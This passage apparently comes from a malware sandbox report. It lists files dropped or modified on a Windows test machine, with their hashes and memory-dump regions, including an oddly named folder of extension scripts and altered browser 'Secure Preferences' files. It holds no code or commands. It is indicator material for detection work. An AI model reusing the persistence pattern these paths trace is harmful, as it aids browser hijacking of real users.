| SHA512 | e00dfb23a04652bac312e2daf50138e79c1d9ead424be44e8263ab36b46c2e7802a833abd44062a6650690d319b6d9f2a4bf429d8aa059a28c53fa4a973bb6f1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | 7d8b03404e2e89b0b6eb68349917bbcd |
| SHA1 | 07d5524ee044bc0e9102398af605323c74013f50 |
| SHA256 | e35190f8838fbae157ab1ef63baf7bdf9e2fd4ae7b179f581c471faf3058b156 |
| SHA512 | f15c9cff49550b976e8a733b9cc79241a2e2d0e7ecb9512989994cad058481171847af413f097c3cc0418d5e32ec71041a8c1a8037fe9f4814fe957b9ecd18d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5b0c03.TMP
| MD5 | 489f0dfbc6d01667889d4432be55c86d |
| SHA1 | 31fd85677df73a54c71383a542ff448a90452fa4 |
| SHA256 | 31e5fe7ee32919adc981e54f41b772341ee9023996f7110131d56989ab6bea33 |
| SHA512 | 74f3bd1c0f9ecdbd24c052b4832789b26554e38a6a448317af2df0ae13617faf2c2ec2b485cfb8bd80514e519de9f03ff065f392d265c4e430480ff2f862617c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 5524cba301c140331a1a2a2f7904be31 |
| SHA1 | 73e4385dd1809c6bb527da4666323d31b715b45d |
| SHA256 | 3391c8c88e244b0463fab1a1f7772477307832752e25f5a7df51f7a2e0dde912 |
| SHA512 | fe194adc4778ab4658b160b4d18a3329551009649e32dea036f50e2942d4f276267348d261246bb5c020886820a865d7c68c59aa069021d4c5f6288bb6830e18 |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | ab67e4770d689320881eeefd1f8ded07 |
| SHA1 | eb157c84187f6930a9060e4ac73dbe52bf73c8ff |
| SHA256 | 0377d4e9b609669d284576c9777a138a0c54fc89b3672d8869ac248fb99c579c |
| SHA512 | 2b141138a77dfedef4650225ffa6ebeb376d3f747e1b8e00365b671a9da45191b9af9da56af941f62b0140e08eb4930af38e2fc900b1d865c3abe32cfbc920b7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Temp\269d6cb3-50e7-48b4-b9cd-93590fa10ce5.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7bcd0bea14fd7cf240db2b923760999e |
| SHA1 | 153359f9df51485f259b34bde05a7dc91744d826 |
| SHA256 | 969c143f5d7cca340ef7a3356d7651c2f2edee9592cc3ea2721b810abadd6c11 |
| SHA512 | 9ba63ac297f93c657626739258cee2912c584cfca2b3655da73d7b5aff53bf925022b333fcf5f292a9aec72148733f06235fa5790ced36ad8a8eeb527fa012d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 2597485e05dd1471d7119777b2a92666 |
| SHA1 | f1116746587b94222dc2b1c81bdaea3f443cdbff |
| SHA256 | d128d60491fed723df4047ba57e1a9fbdcffca5f085f2a14e1fd7c0bfc63fc9e |
| SHA512 | e3adbb408b61048f6be75b0dd7db09d3db85d9e726a515fc09aae052f872335e9da97a4fc5202135e1b270711ca244481dd52c5870db3efa312eafa1a6f35a7f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | b0f6eb97dee086c9e180067a064862c0 |
| SHA1 | accf4fdc9a88769369051e9ee0a7b2c723ec3f25 |
| SHA256 | b8bb0db75c84f0d8e4a03179c80dd7a8009d3997b6cf47daf0673b9075ee0826 |
| SHA512 | b18933491a9abb02fc39cdc72213e82b2f02329cccf4464062d857e6ab7325ead50e8cc204e7a76934b1574ec494dc9a650e247ea1b1953da2c87674747cfaa9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6ba87141618efbb3ecbe57f1bf47b700 |
| SHA1 | aee29e69ca09cd1db5592a54fabceb40f91d1822 |
| SHA256 | f6e68f3e58108b5c89a293f9a7865c5ee357cb805c0ab4b1ebf085baf3cbfc68 |
| SHA512 | 093538e946a1b2d5e61c303274b188518c0cb356566189eea30f2e2cb8a66d2dc8c970735032539e4e88643e8e8dd0220390f7c8ad6f584e2ddc84237bdd316d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | a44730a821e1b97724f134595ebf425c |
| SHA1 | c1c0681b3fe825727ab8e3b89e85f4409ec1db58 |
| SHA256 | 659f24408fe7a00d1defac879ee821cca25d1a3c9deaf005068a5218fb0df06f |
| SHA512 | 01f61c18736a0771b5ced7503992ef28d958de4cbebbc80320d9e328150f1eef6bcad68e8b07109d7dad31b5c62996927d10eb2fd88228541fbae0e10a5ae378 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b468db5721c9bea3ee62e6641a2eec9b |
| SHA1 | 5d8673c8bdf1aab4b28a410ccfb04f2bf133bbb8 |
| SHA256 | 487e159403d5c227f56695fa7c9bfc27ff80a1dddea9418545a31c143aeae817 |
| SHA512 | d0da6e8aa970d72999c6d975935be30cd3a3e037bf7a90a6ff6df6dd3ca57a6f75eef74c6e5a8214848bdd1a403ca9a75a6f0b8a4beabedd15600f50f3dfff8e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ba5d56d8b9a3b54c5a9a571add32417c |
| SHA1 | 520a619fd900ae9da8c02e607b9b7a2fe5946f68 |
| SHA256 | 5f688ed7c8e15d6d5fc5688fe7da7203540f764e1f1e49114120a95e6778a162 |
| SHA512 | 203c75db65641c8677253b74f8d38ce9e43b68ad49786f6bacd621730bc5c6925afd008abb6a91d6ea6e3df79635dbe4554fa0db0cf818121363739184acf474 |
memory/2288-981-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-983-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-982-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-984-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-985-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-986-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-987-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-988-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-989-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-990-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-991-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-992-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-993-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-996-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-997-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-998-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-999-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-1000-0x00007FF87F9A0000-0x00007FF87F9B0000-memory.dmp
memory/2288-1001-0x00007FF87F9A0000-0x00007FF87F9B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | 7c2a94bd1042529c7c4436640fff94b7 |
| SHA1 | df542e78e77a92e7c69c95f2f1ad6420591ef291 |
| SHA256 | b8929be8a20b0b736aa2bf01910526c6007b3568ed8be63a11b4b008e090bcd1 |
| SHA512 | 2034043a27b4b8984dec729be8d5e66c926e5163aac4addc0182725b49fce0c495b8e08682940f566512f71617a438e208434208e184a84524f2c7549725e22f |
memory/2288-1036-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-1037-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-1043-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-1044-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-1045-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-1046-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-1047-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-1048-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-1050-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-1049-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 7202441009a21953c73a0e5c8587bd99 |
| SHA1 | 20593b74ebc6d3bff82df44accbc850983204786 |
| SHA256 | 78a2f852fa9bfdad524669a4e6125ea21ef69a7f33c7a48c609f557d7d77b54e |
| SHA512 | 09f2d053afb4c1c20150ab294de8e6969c7f189320e81d20e356ada83fb980369409f80ca70f9e0d61cceb68fbe73b34b45a6acb14c9328ff99e6866a30d03b2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | c848ef6c8649b0cdb8c61b7655b56e03 |
| SHA1 | 9c6636c4c1671521fd63e1a2ff14bbec66892f3f |
| SHA256 | 26f83bdbd9fa4decdc73250ab788cf429a207a3d94d5cf1af5372018d1978153 |
| SHA512 | f0ae75728c472d2bc8657cd7b3294fcf2b7c413a28c60fddd44c01716f0cd87ecc26d4062ee10c14dd733ab90ae3d93021f5c6d455b86f7d01fc3c98f6f5d022 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | dae7ce8122789a22f1341632928523ec |
| SHA1 | 6d556c6623cb9ec19943c16dc8e9c885dec72285 |
| SHA256 | b6bcaa99e58edc1c3ef5157118e79ef12ae14b18470f0952dc9320f8a0a7a852 |
| SHA512 | 414257d4effbb50625412204f30715aaaf829c2b913857a4e2bd591b83b88db7c4b8b80ef84ff1e1ac611e3b051e3a66bbe944aca52e147d4f5a2ce3eeb3ccab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | 848cdcb690e2d3ebef461807ffd02d5c |
| SHA1 | 9d55e5bbb00b0f8c7100f0c07dc471029c89e7a4 |
| SHA256 | 238ab7590e50c4122696846333f14fb2ebb8b147f12247207f5369d09715c5f9 |
| SHA512 | 0996431d5a3da2b799f34afe73716b89a7ca37dfd2d22ec5d5d994d3fbc3cbb79c5325097da1dab9764c7bde70773fe1c795f419d7e6bc8e2fbbf7bf42834a23 |
memory/1640-1090-0x000000006B480000-0x000000006B4C1000-memory.dmp
memory/1640-1089-0x0000000065A80000-0x0000000065AAA000-memory.dmp
memory/1640-1091-0x000000006A800000-0x000000006A80F000-memory.dmp
memory/4912-1098-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/4912-1100-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/4016-1099-0x0000000065A80000-0x0000000065AAA000-memory.dmp
memory/4016-1097-0x0000000000400000-0x000000000054C000-memory.dmp
memory/4016-1101-0x000000006B480000-0x000000006B4C1000-memory.dmp
memory/4016-1102-0x000000006A800000-0x000000006A80F000-memory.dmp
memory/4912-1103-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/4016-1105-0x0000000063080000-0x00000000630A9000-memory.dmp
memory/2496-1113-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/2496-1114-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/2496-1115-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/3700-1116-0x0000000000400000-0x000000000054C000-memory.dmp
memory/3700-1118-0x000000006B480000-0x000000006B4C1000-memory.dmp
memory/4212-1122-0x00007FF89F8C0000-0x00007FF8A0381000-memory.dmp
memory/4212-1123-0x0000019FEE260000-0x0000019FEE270000-memory.dmp
memory/4212-1124-0x0000019FEE260000-0x0000019FEE270000-memory.dmp
memory/4212-1135-0x0000019FEE260000-0x0000019FEE270000-memory.dmp
memory/3456-1153-0x00000000000E0000-0x0000000000108000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5j8DxCjO4h6M7cc..dat
| MD5 | bc8c2ebedf8f83ad188ed263f1cd3375 |
| SHA1 | abc42cabb39db3cb6f4d6e526b2bd01fc99d58be |
| SHA256 | cd454c9fca4756a4e896a12686877ea8331928b7b9c2beba233df72426b9b7fa |
| SHA512 | 21216157309e04e3690b89914a0d22786f18f9f36a6d841bbca9328d58dd0a8804056e9beb9f462ddffe8114231b831eb46e26268920aeb94979cf3a226c70c5 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\rules.json
| MD5 | 6c96a8e0dc7f99afebd022054a96bff5 |
| SHA1 | 836c9f51bbbc8e5dc096cee29d7354b3a2211de1 |
| SHA256 | 464f3f4c07331ae1f15fe0e6a209b4cfaf8cfce14a7c79eb192cbf2c49bbcb19 |
| SHA512 | ebad39459aead9cac1d3d1bd27459de20f107a19c3492678b869d8488e014fb2fba168c7a0d98cfb7742a4052e20ba526bef29aa63cf79f923dbdb926c87469d |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\modules\content-scripts-register-polyfill.4.0.0.js
| MD5 | e2cdab6fd36bc5e771aa9e4ee2792ce4 |
| SHA1 | fd3fee7dc43c59636c8663a38cdef6ed1ccc6a25 |
| SHA256 | 9d1c97a6c1bf526de3f65a54f691d2540ca1dd300ed038f1df41f5fbd9ed2730 |
| SHA512 | e9741d3753f8483d033f00a4041d0d248b8013746d023ab31edeb649faf8f14a55e49a582fce1b0fa13866fc6d50917df683e3aca211d56b8e9855e7a93038fb |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\commands.js
| MD5 | 356e0d12f629ea365f915f4601251524 |
| SHA1 | 32abd4c94b877d2e4e68199c589fc9c5d96efabb |
| SHA256 | 185096fa1cda20813b58cae34659717e79fbd8bd8b89c95c9a93e3ca68efa2a1 |
| SHA512 | 5b742841924421fc32dc0206d40a011546fa29629077ee6df644d9c3aa2fe36bc01d4ad1a939b1a79d4b5ec6d82cdcd5b157ad4a438e34db7ba99eaedced9d68 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\extensions.js
| MD5 | cab74f7fb79c1921db62ffcbf2a43041 |
| SHA1 | 03d69ccbe480d09a94cbe394d9d5befcc68133ba |
| SHA256 | c4fe0a069bcc13d3f783deb92e3adab1053c5d99407547f1fcbe39c7f342af39 |
| SHA512 | 044754865af6950bf7b534e74d608bb47df3a537904f89e61bc4c2c03860de45786504e2fdebb4d4ef356c8ba078ce1fb185d4beb1fde1407c41511bdb07cc76 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\exchangeSettings.js
| MD5 | 055b125ec5b05895873435e423eca4f1 |
| SHA1 | 811c2f93b1b3644952c2a6eab8ef9dd8c9605edf |
| SHA256 | 2c9084f1d82aae713607e72e6f7825076328a9f3dfaa6ad89d7d069235a95e7c |
| SHA512 | ab99affad8a6f4762dc5ee2b906f7c2d4a0cfb448a095026d0039b74355b3a8303aafd97d1674fce2ef8db121a4beac134e356f86237ca45f14b155c5f5bdebe |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\app.html
| MD5 | a10ca2219a68335cf253395574f7d285 |
| SHA1 | a7111f1292518214ff4bf0920432c72c978c5b65 |
| SHA256 | e9b3c0b944e83cedb78440a99cb793fdf32fa6ea8c36fb89c638de75f3af602c |
| SHA512 | 61a1c7905dc6077fb2bc55296c7d477ca8fbf5e0763633356fdb32844f128313e629bb7c0f7081939b75eb5c452b8480e60b36eb88ca2477b5abd9b5eb4ccbe7 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\utils.js
| MD5 | 86eaae8138cf039c05e0be5dc807d9f1 |
| SHA1 | 6a43f5227be21c2a3a2526cd3dd6a6e10425ea04 |
| SHA256 | 0f2b72153f263cfd7c2e5640d2362a1731253070c408d278ded46bb762e50f14 |
| SHA512 | 686e7090d10c35c404c510214a31d80a2ac041f6db2cb94d8f6f5ae47c146fb18eab96573c33e1d5ca4dfc21ac70abe94b4412d6b9621de9a9d01d85229acf99 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 31af3e895896b8bc25db0004afa3bb1f |
| SHA1 | bb8ce8e9e725f76a2d64d21afdfb287b4a74c11a |
| SHA256 | 142c5c4cfeb0b968fe312d89282b0d4979225b3285bfc1ba2fd5897d3487180c |
| SHA512 | ea7e780c2e8a42780c4dc19eb182dc8542f5b34047589a720c7b3fc4fdb76a992b3722d105f3ff617e0ede9ce37e7db3bc261081ff7b46d9924d96bfbd41756c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | ffb219f47d2339fd257b6bef93dd11e9 |
| SHA1 | 2efcfc93f9609a88e861126d84cfd59b2b318254 |
| SHA256 | 33ca89491898d6236f025c6e890a64a161a6ea7802d6ffd063926e3174d4c750 |
| SHA512 | 0e412a272fe86346a9a6489c703f36c2c658b4f1bafce072ac43aaeb3d5b33b05230599b6a8e8baebed519413dad7dcbe0e0ad8b13904a06c80c256b6aba1bba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c0aa56b55ea267df672bd20da3afe198 |
| SHA1 | a823036510dd563efd962a810897a45d78ca4b9c |
| SHA256 | b8ed7d1bb5afd384da5db05fb8f369fc618f0f40b0966f64c3ade80049c41d22 |
| SHA512 | ea66ecc5a1b3492fa8f96d8f42209d803c9e14539451a06d2727e99b81a403dbdb5df94e4407a5508ebe3217a4b7afdab2958ebf39efe58558cd8769034e5352 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a421394116d7192e61e44dcca8be2b1f |
| SHA1 | 277706740e054511b9f9566046eeb3e5a92176b4 |
| SHA256 | 2b9a05993ff2bc5552e8270759112d3ca61c1e34d7fc19654eab4075e854441b |
| SHA512 | a6e988c4aa12f8c96a5039c24d996ed2f8efdf612fe77de5e2fca63d3a1436dcca31b7d14d9fb6fe3face43e70bca8cd797a96f2bdd404872eb43d7593743562 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b6a2107c0bf35a9c542f6ea337939a4d |
| SHA1 | 0e5015bcd2c1bbac0790696a6af69724a9fe218d |
| SHA256 | d1ed1a71ff94d7d2ebe02bd87ea2b439d25552a2fea59c142b081a80f910aed6 |
| SHA512 | 8906be1e7432f5aaab05a4bffe85460c6e6fec7b6052d1c3060de40370380bf0e236a10a7cdd3c3ed3724dd203a348ad372769a6b7ffcba58513bcbbd221c9c5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e66048e11418e28153d4a508e6e3ebda |
| SHA1 | f819e21c18516b257b4a62fe218a5edf6e067f8e |
| SHA256 | c3f7902a1f34e0611e2b9e10d9804128e994b6f995b41c68aa261dc22c47bc43 |
| SHA512 | dcebea62a05bde4373982ceb6edbcafa23da187009f7949b47846749f23d5d4440d73c595e8f04044fb2ed5b1bee342759bd23e5415a35a58f439f8d692749e4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | 8c24bba1a11e3cb4000b3b8f15d82a66 |
| SHA1 | bb59e3574b1b0f497206eb37ffc7d9138b198200 |
| SHA256 | f2727a0d42fabb6cd86e1cdcf2f299afc43595a1f6804d957be87a5bf4cd65ca |
| SHA512 | b95f111b5b99647b3e3555a34de9fd3c6b8bbd795a646ca5b3948563b990daf041fb78fa1865dd8f5f99b85e423ccf07e8c5911f863ccdab03c88883aa256fed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b0359595-04a9-467f-b06d-95c7ede11ec8.dmp
| MD5 | 295e9b37bc3a8699ac9d5d50d89b73d9 |
| SHA1 | 6e7671d80e81ad68a6f7ee56420ac9f076c162fe |
| SHA256 | 0088fcda612d3fbeeb1ed813669f96e9822243458d247c67238f7c20be5f403d |
| SHA512 | e3a9f309b0da9f3e91cad263d9ea4d0df049ffcfdd40852c0a161e6186b6a11dc6938ac9c9fbbf14ba5f9b3a5e3721e0af763750e0655e5a254b2251bfb08733 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0b821d41f9230f6d01e4fbf49a7c2937 |
| SHA1 | a4fe181bdeeb0e7a97813c1c4d604deb1ccb6f31 |
| SHA256 | 867eeb0668835879b2f2e99c4fc20c9318ffab5c82f091712efcd76f6f94cd00 |
| SHA512 | 85ea8b5667a18ab703f14a9fb63faf3160b8419b5f7e5f1d479d7666f4558f4cd7dcf4da6a36965daa45f5f3486dbdc06ec0e34b3a0c765855ff309f53595d5e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6e8402929329a1948373d43b96ae3b0f |
| SHA1 | a46eb3c12614ff4b850bf8cf4d492f596b8a207a |
| SHA256 | da4ea854907f1c8c8e655d7f3d7c19511fbbaf8fb6bba92471ba8962f10326a2 |
| SHA512 | e760d2820af6d4de29654cea592d8ff6f033482e2aa5b888ed45233ff30d01e38db8d9d074abd0c5e449270abfaf284db5752160891c0f2892142b261ac503ce |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8d3aec1158b16a4b346a5b1f9edce498 |
| SHA1 | b186c54befa103b3982e4b655d1fe781a1b277b5 |
| SHA256 | 859c7fc1d6735cec0d3b8b620199f3b63181bf5c28f89c4f0acd05e4ba3c919b |
| SHA512 | 40089f514147b0374e11ca4704126e42a1359fc01d35d6de0536a60cda1d9ad325d7b62c34fdc7966067252302ad3e062f05788adddeb354d4f76b0e46d81674 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 7bc5657e8c1e87a70e4c31e84f6b10eb |
| SHA1 | 6888bc8a52b514fd8ea71a5fa8590fc245420e98 |
| SHA256 | 734057e66f81b40992c1ffa55670b33e0d1288e36af53cc65d45066883987d60 |
| SHA512 | e59c2dc55624e1f1e43fd0a50b355a1863a0d5bc366cb00935eb2f080bf3d7096676d99d6c1bcd542ce6d26bceaf8bb0c921f73c23442babb3bc3bc38fb50a99 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1
| MD5 | f26372955c1344efee1686dd10fac4c5 |
| SHA1 | 6a0e58444e9f9be90588c397b37a438db2bed294 |
| SHA256 | b9b110e6e85ffabf8440785d4ac0e0924ec577be3edf1ba7d6fe466039e88cb8 |
| SHA512 | 706dc8267bc04acf6da06e93cdbdcc84b4ff56df4327c849472a73666a6dca113d8236dcc79c1bccc5b05d1ff8619c79e1334cfe159f3cf8be4f7cd082cfdb30 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000016
| MD5 | 757d6eefadad52434d858027028b5a5a |
| SHA1 | baa970f53eccf09e806f4d12840bd0dd172285a5 |
| SHA256 | ee5d5dc43d17b5c0e6871674128062560cf846a4cde2752bfdf91214bae301dc |
| SHA512 | ac09cfb97c3bf28b0cac425490ee0d263832946cfea99a13cccb7da5a586ba15ed0f6fbfe0bd7d9ec983b8b2717aa0e15abaa27239caca25fcebe840cb6555d1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ea2073edde46f27e79fd05eea3f52e3a |
| SHA1 | ddafdcf9cff8f7c5ac2b03ad62a79ee3d9ba0cef |
| SHA256 | 0d00aead436b1f8d6900964132eb475ba8e896d95d572d0f6d53c8d5993a837b |
| SHA512 | ffcf6c400eff528f05c88fc2a3568e44da6317bfe54971f0ab968a8771019536d721cb3301120c8230a2291c9c7deffa1e8fb964dedc0f8cbcb3b81b98f1cfb2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | 0ebf781469919430d17e3bc895a151d6 |
| SHA1 | 843540b5130b87996b1f8df08a1fa693269937be |
| SHA256 | ee7272ef1e09b2c9fcfe4a88a35468977c8c7c6048b13bc292f0f70350ca15b6 |
| SHA512 | 1e398c25e01a43757f902a37a5342c99e73865a22f21a2feb62f6ce2d6eb6def14672a386f61537c9779d26fa6af4cc06478d042301303aea6c9cb0faeb83ea5 |